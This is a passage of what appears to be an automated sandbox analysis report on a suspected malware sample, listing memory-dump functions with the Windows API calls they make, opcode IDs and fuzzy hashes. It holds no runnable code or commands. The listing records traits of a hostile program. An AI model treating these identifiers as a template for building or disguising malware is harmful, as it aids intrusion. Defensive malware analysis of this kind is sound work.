                                                                                                                • Instruction Fuzzy Hash: 99112DB6C003489FDB10CF9AC848ADEFBF4AF88324F14846AD468BB600C375A545CFA1
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 06EA56F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: f5f4e3a8692d4a614448f9aa4324c6fbdbcc7c1aca0fc0181dfa4f0b0f423f4c
                                                                                                                • Instruction ID: 089d8913832c97bef3a64692fddac7c725cc7aaab1815b3dba7eec9bea76473b
                                                                                                                • Opcode Fuzzy Hash: f5f4e3a8692d4a614448f9aa4324c6fbdbcc7c1aca0fc0181dfa4f0b0f423f4c
                                                                                                                • Instruction Fuzzy Hash: 09111FB5C003488FDB10DF9AC448A9EFBF4AB88224F10846AD418BB200C375A544CFA5
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 06EABFD5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: bc47607f9e134e75eff3c75cece5a43927ab4d9a5bb15c55da31ebc29226e3ba
                                                                                                                • Instruction ID: c373bc86db31e67ab2d31f1fb9897666c77a3622633d2ab00c078289af3d0248
                                                                                                                • Opcode Fuzzy Hash: bc47607f9e134e75eff3c75cece5a43927ab4d9a5bb15c55da31ebc29226e3ba
                                                                                                                • Instruction Fuzzy Hash: C51145B88003488FCB20DF9AC848BDEBBF4EB48324F248459D558B7310C375A944CFA5
                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06EABA8D), ref: 06EABB17
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959119252.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6ea0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2492992576-0
                                                                                                                • Opcode ID: a639025ac0372af7c41a75026d4b44da357e1920647d929af874e05d517b7b26
                                                                                                                • Instruction ID: 5b1dbba34032570086c31acfd294b6d925983781cae6bbd5b1ea1cfe09270c75
                                                                                                                • Opcode Fuzzy Hash: a639025ac0372af7c41a75026d4b44da357e1920647d929af874e05d517b7b26
                                                                                                                • Instruction Fuzzy Hash: 271133B1800348CFCB20DF9AD889BDEBBF4EB48324F20846AD558A7304C374A944CFA4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: 7f4be2fbee33600c1dbd4bca39161ecd81c3d55fa11dd2d838dca3a9272a7c40
                                                                                                                • Instruction ID: 16fd370375bf822ac0be1a495a6486a1810fd9d27dbe63a15d96b8f15d83a9a1
                                                                                                                • Opcode Fuzzy Hash: 7f4be2fbee33600c1dbd4bca39161ecd81c3d55fa11dd2d838dca3a9272a7c40
                                                                                                                • Instruction Fuzzy Hash: B4419A30E0030A9FDB65DFA5D8446EFBBB2FF85204F246629E401EB240DBB19946CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PH^q
                                                                                                                • API String ID: 0-2549759414
                                                                                                                • Opcode ID: 2afb88072c570919f8e2185df759b9a94460a2607716f67a97a28650d05f00cc
                                                                                                                • Instruction ID: 27cf7ada81bc018b7793771ed569747c5ab53c467193b164b2f70a66a4ef11cf
                                                                                                                • Opcode Fuzzy Hash: 2afb88072c570919f8e2185df759b9a94460a2607716f67a97a28650d05f00cc
                                                                                                                • Instruction Fuzzy Hash: 7931BE30B002028FDB559B74D9186BF7AE2EF89604F20A528D506DB384EE35DD46C7A6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: \Ocq
                                                                                                                • API String ID: 0-2995510325
                                                                                                                • Opcode ID: 64fdff9bbe9d6079f0a4aba1b2a3e4ca926dfc99f06e2dff6e3405204949ed2f
                                                                                                                • Instruction ID: 89713967551d1253b556c9f38d4ec140f0c43975308eec189aaa64150b0091a6
                                                                                                                • Opcode Fuzzy Hash: 64fdff9bbe9d6079f0a4aba1b2a3e4ca926dfc99f06e2dff6e3405204949ed2f
                                                                                                                • Instruction Fuzzy Hash: 72F07A31A60219DBDB14DF94E899BAEBBB2FF84704F205119E502A72D9CB741D45CB81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c55a0347e51b5527a2753cea49206741c983f76e3a5b01a3c6f41ed5d77093a8
                                                                                                                • Instruction ID: 061cc1546eec091f3165b983224966efd0666e172d71232bbe4a5793207a93ff
                                                                                                                • Opcode Fuzzy Hash: c55a0347e51b5527a2753cea49206741c983f76e3a5b01a3c6f41ed5d77093a8
                                                                                                                • Instruction Fuzzy Hash: 5761DF71F001114FDF509A7EC8886AFAADBAFC4624B25543AD80EDB364DE66DD0287C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 86dc1834785d323523300894a387c6b44b8fce3c3788011fa8133bfe633fb66d
                                                                                                                • Instruction ID: d2d9edfc241e137ba637414876d524b921f1f51366616d42a3b4df71dd93c176
                                                                                                                • Opcode Fuzzy Hash: 86dc1834785d323523300894a387c6b44b8fce3c3788011fa8133bfe633fb66d
                                                                                                                • Instruction Fuzzy Hash: CE817F30B102059FDB44DFA8D5547AFB7F6EB89304F10A529D40ADB389EB34DC428B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ebd38855b01d3882577093435c0bb8032204b8af38cd665e57d02f0e4ba66079
                                                                                                                • Instruction ID: 4d7d73d53991841000028fa379e7be7922f054eedef750e103deef5eca9d4d50
                                                                                                                • Opcode Fuzzy Hash: ebd38855b01d3882577093435c0bb8032204b8af38cd665e57d02f0e4ba66079
                                                                                                                • Instruction Fuzzy Hash: 80913E30E1021A8FDF60DF68C990BDDB7B1FF85304F208699D549AB395DB70AA85CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 097effb7cadc262032d4f06103910292f9a6e4d36a29546ed095c373ab89850e
                                                                                                                • Instruction ID: bbe1d82d37029095de20ddbb0745e2550c05d8b6ea27d1f90757e577d3ec54f9
                                                                                                                • Opcode Fuzzy Hash: 097effb7cadc262032d4f06103910292f9a6e4d36a29546ed095c373ab89850e
                                                                                                                • Instruction Fuzzy Hash: FA914F30E1021A8BDF60DF68C980BDDB7B1FF89304F208599D549AB395DB70AA85CF91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dff88d899db6106d545bd3d374771637ec8e554c2e1d96b3f2d62aa295158d00
                                                                                                                • Instruction ID: 74b8a045f7ef619718f698d0b7701f63522ede9b42bb76713c10a7ff57c055c3
                                                                                                                • Opcode Fuzzy Hash: dff88d899db6106d545bd3d374771637ec8e554c2e1d96b3f2d62aa295158d00
                                                                                                                • Instruction Fuzzy Hash: AA713E71A002499FDB54DBA8D980AEEB7F6FF88304F14A529D005EB365DB31EC46CB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7b65b1416f6cd2d7e938198726a0dced8ae13cc9076d5ee285eb330ffd320c9c
                                                                                                                • Instruction ID: bdbacbbff6c1ddc5fe1e721e7256f2e92f97948cec0be12ed7d7cbb9a54dfb85
                                                                                                                • Opcode Fuzzy Hash: 7b65b1416f6cd2d7e938198726a0dced8ae13cc9076d5ee285eb330ffd320c9c
                                                                                                                • Instruction Fuzzy Hash: D0711C71A002499FDB54DFA9D980AAEBBF6FF88314F14A429D405EB365DB30EC46CB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6e7e1cb7db118121f984b2195240104ef1222503d8d6013b2d5e94a6ade39191
                                                                                                                • Instruction ID: e1e6d0ac4206a53d98e996f9492dff31a71b22cd664633f697aeeec05a7a7e40
                                                                                                                • Opcode Fuzzy Hash: 6e7e1cb7db118121f984b2195240104ef1222503d8d6013b2d5e94a6ade39191
                                                                                                                • Instruction Fuzzy Hash: 4751D371E01205DFDF54AB78E8442FEBBB2FB84329F20A869E106D7251DB358D55CB81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3d5170d63a6d13c8b3582d55ca1a988f6b50570f5af44e42d49284c39ff71cb2
                                                                                                                • Instruction ID: bfed25afcf399ddacb1da78d9adcd7537497595ec3d7863dc785acd4cc5b90e7
                                                                                                                • Opcode Fuzzy Hash: 3d5170d63a6d13c8b3582d55ca1a988f6b50570f5af44e42d49284c39ff71cb2
                                                                                                                • Instruction Fuzzy Hash: AA51C270B103049FEF64567CDD947BF265EDB89354F20282AE50AD73A4C92ACC8687A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ea036647067c13f905e147b3a4bf2fe39b0792e16c73f96100d6bd4ef6c7742b
                                                                                                                • Instruction ID: 7fe021f0a6e8890eed8da54f067da3f95c8176a919180a3bd8ee51efee77be05
                                                                                                                • Opcode Fuzzy Hash: ea036647067c13f905e147b3a4bf2fe39b0792e16c73f96100d6bd4ef6c7742b
                                                                                                                • Instruction Fuzzy Hash: 6651C370B103049BEF64566CDD947BF265ED78D314F20682AE50AD73A4CD2ECC8587A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05245c392c6ea4f7ea544d748ca478ba2122cfbda4293eb5183143df0754dfbe
                                                                                                                • Instruction ID: 1c02b6129b3161fbb87ec0541ddbf7ad9092849da8285966944a03d25e0b24b2
                                                                                                                • Opcode Fuzzy Hash: 05245c392c6ea4f7ea544d748ca478ba2122cfbda4293eb5183143df0754dfbe
                                                                                                                • Instruction Fuzzy Hash: 84416971E103098FDF60CFA9D880AEFFBB2EB95314F10692AE216D7654D371E9458B90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c0ce58aec20f4abe98050a782e417b39a1a5ee1fad70bc9c6d8177b2138e9d65
                                                                                                                • Instruction ID: ce0cf38ca7974b8bc185ea358b92f6770cc7596fb6b535d81cfc560e753b7731
                                                                                                                • Opcode Fuzzy Hash: c0ce58aec20f4abe98050a782e417b39a1a5ee1fad70bc9c6d8177b2138e9d65
                                                                                                                • Instruction Fuzzy Hash: D531E170E103198FDF609F68C4806AFBBB1EB86324F25A56AD459DB291C234DD42CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fb145b0ce9ae9d36a368fdc6d98dd46e068763f1f74e190925723fd37eb9e423
                                                                                                                • Instruction ID: d2ba8540702dd37558758c6770220e2cea3de50eceea4fa48f3130f0dd593339
                                                                                                                • Opcode Fuzzy Hash: fb145b0ce9ae9d36a368fdc6d98dd46e068763f1f74e190925723fd37eb9e423
                                                                                                                • Instruction Fuzzy Hash: 7031A130E1030A9FCF65DF68D8806DFBBB6EF85314F109529E405EB344EB71A8868B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7750150c961a4bcaf9a15186550758683b730d59854973c786ee501968aa208f
                                                                                                                • Instruction ID: 504aeffe8d44c74202bf314158c148b2e91a114912fbdd76b07a4e2c307cc97e
                                                                                                                • Opcode Fuzzy Hash: 7750150c961a4bcaf9a15186550758683b730d59854973c786ee501968aa208f
                                                                                                                • Instruction Fuzzy Hash: 4731AFB1D06219AFCB10CF99D981BEEFBB8EB08314F10816AE508E7241D3749950CBE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1506018679d42f12b79e78786a0cc9e138b407b20e9773025f6b0132d8b32a28
                                                                                                                • Instruction ID: db9bdff03b4ce08020015c962ec7a06cfde6c268ad1be19fd2ad0fca262966c9
                                                                                                                • Opcode Fuzzy Hash: 1506018679d42f12b79e78786a0cc9e138b407b20e9773025f6b0132d8b32a28
                                                                                                                • Instruction Fuzzy Hash: B2316C30E006099FCB59CF64D8586AEB7F2EF89304F14D529EA06E7340DB71AD46CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ee0475095e5422a4350da27ced34b497000eb3be20178f633b67ffff362373b6
                                                                                                                • Instruction ID: 7148eaf8cb6ef1448f2782c303b2098149ef7b576c739373b679fed816d0ca88
                                                                                                                • Opcode Fuzzy Hash: ee0475095e5422a4350da27ced34b497000eb3be20178f633b67ffff362373b6
                                                                                                                • Instruction Fuzzy Hash: 5C316B30E002099FCB58CFA4D8586AEB7B2EF89304F14D529EA06E7340DB71AD46CB51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8dc0f449ed0e0e45ad64964c4e1dea4fde598d613f8f4496ddd3e7eda077c53a
                                                                                                                • Instruction ID: 830504b588f1a24354895c7819e5b98c45b373283031b7d9affc973f81d67b59
                                                                                                                • Opcode Fuzzy Hash: 8dc0f449ed0e0e45ad64964c4e1dea4fde598d613f8f4496ddd3e7eda077c53a
                                                                                                                • Instruction Fuzzy Hash: 1C217C35F41209AFEB00CFA8E840AEEB7F9EB4C710F109025E905E7390E735D9068B91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0bb9c627ddc6f298434c61c7c77e7492e88473ab516388800c36ee6777d118ce
                                                                                                                • Instruction ID: 65ca0aeac736eaf1e5210fe831642647cd515c5e57fea34df2090047b1996a60
                                                                                                                • Opcode Fuzzy Hash: 0bb9c627ddc6f298434c61c7c77e7492e88473ab516388800c36ee6777d118ce
                                                                                                                • Instruction Fuzzy Hash: 99216B75F00219AFEB40CFA9D880AEEB7F5EB48710F10A025E905E7395E735DD018B96
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2921821057.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_16dd000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9df88b198689e1a2c59c6141b37215e5bb30a07394559fdca5dcea4875aff006
                                                                                                                • Instruction ID: 4ecf27e250ef5c623b7f30c2a65bf7d93078d00ea0a144d290db71c257965864
                                                                                                                • Opcode Fuzzy Hash: 9df88b198689e1a2c59c6141b37215e5bb30a07394559fdca5dcea4875aff006
                                                                                                                • Instruction Fuzzy Hash: 1421F271904204DFDB15EF98DD80B26BBA5EBC4314F24C56DD90A4B396C33AD447CA62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2921821057.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_16dd000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5550eb08d9a32c75cdaa22114e75791a565944a7e5a5cdfccbc07a8e979f2e54
                                                                                                                • Instruction ID: 4950ee2af5c50e494892fd00e79e58f3b11b8cf4f24a3c9226cadb40e8c522d0
                                                                                                                • Opcode Fuzzy Hash: 5550eb08d9a32c75cdaa22114e75791a565944a7e5a5cdfccbc07a8e979f2e54
                                                                                                                • Instruction Fuzzy Hash: 892104B1A44200DFDB05EF68CDC0B26BFA5FB84319F20C56DD8094B392C336D846C661
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0390dcf426f47726fa9e067988881a285adbb95eadd6fd6fd5996667923e9e0a
                                                                                                                • Instruction ID: 4699d24940b5e0c01c5220546ffafc4b23bb5b3228783a999eb9fc0d7f794dbf
                                                                                                                • Opcode Fuzzy Hash: 0390dcf426f47726fa9e067988881a285adbb95eadd6fd6fd5996667923e9e0a
                                                                                                                • Instruction Fuzzy Hash: A911C431B102105FCF60966CB8547EFB7DAE789728F10A43AE60AC7340EE25DD028795
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7d2eeeb7109e7b3a273250abaf0996f49503aaa0d3d83a2e5e1d11e72f0ebe21
                                                                                                                • Instruction ID: 829d490acdb4ff6220c172bfacbe0fa383a9b9edc8c372b24b38dc735eae259d
                                                                                                                • Opcode Fuzzy Hash: 7d2eeeb7109e7b3a273250abaf0996f49503aaa0d3d83a2e5e1d11e72f0ebe21
                                                                                                                • Instruction Fuzzy Hash: FC01F9317043109FCB95996CA8487AFBBDBDBC5614F18643AE20BC73D6E925DC024395
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 11cd22c6d44f97a10e9cad55c607d5d6e25fb69cd60aa3224ad27d6205450be4
                                                                                                                • Instruction ID: 86ed0175526a147795275d05d30d4044d57d0c0e6193d07c15c82461c2a5d052
                                                                                                                • Opcode Fuzzy Hash: 11cd22c6d44f97a10e9cad55c607d5d6e25fb69cd60aa3224ad27d6205450be4
                                                                                                                • Instruction Fuzzy Hash: A7118231F102259FDB549668D8146EF73EBEBC8354F049035D50AE7384DA25DC0687D2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: eb968ddb46cb9fd139892832d8b065321cf784d4fc9ed23b34d07b3094178bc7
                                                                                                                • Instruction ID: e26333f7175535cc18b6cce18e8ecd25fdaf9662cfc92f74f113d287d014f747
                                                                                                                • Opcode Fuzzy Hash: eb968ddb46cb9fd139892832d8b065321cf784d4fc9ed23b34d07b3094178bc7
                                                                                                                • Instruction Fuzzy Hash: 5E012432B002100FCB61957CA814BAFB7DACBC9624F10A43AE20AC7340EE15CC4383A6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 59452a72301a64dffc11f44a1ba04d2568fca342e20f796197110a6a05b260a1
                                                                                                                • Instruction ID: 8b3e30ff208d9e92b674e9b297e7dd8e43d686c4bdab94162ba18c267782ec4f
                                                                                                                • Opcode Fuzzy Hash: 59452a72301a64dffc11f44a1ba04d2568fca342e20f796197110a6a05b260a1
                                                                                                                • Instruction Fuzzy Hash: E301F935F10225ABDB949A789C107EF77EBDBC9704F00617AC607D7289EA259C0687D3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 563f58bad3e5c087b64347937f2e53b84e462a3d02cadb7e4fc26795362da1fc
                                                                                                                • Instruction ID: 6acaeae7f21523b6680b4ee8b4cbb3170c5b915cde7a23a23bb26e6d4d6e8956
                                                                                                                • Opcode Fuzzy Hash: 563f58bad3e5c087b64347937f2e53b84e462a3d02cadb7e4fc26795362da1fc
                                                                                                                • Instruction Fuzzy Hash: 6F21C2B1D01259AFCB10DF9AD885ADEFBB4FB48324F10816AE918A7300D374A954CFE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2921821057.00000000016DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016DD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_16dd000_iNFGd6bDZX.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
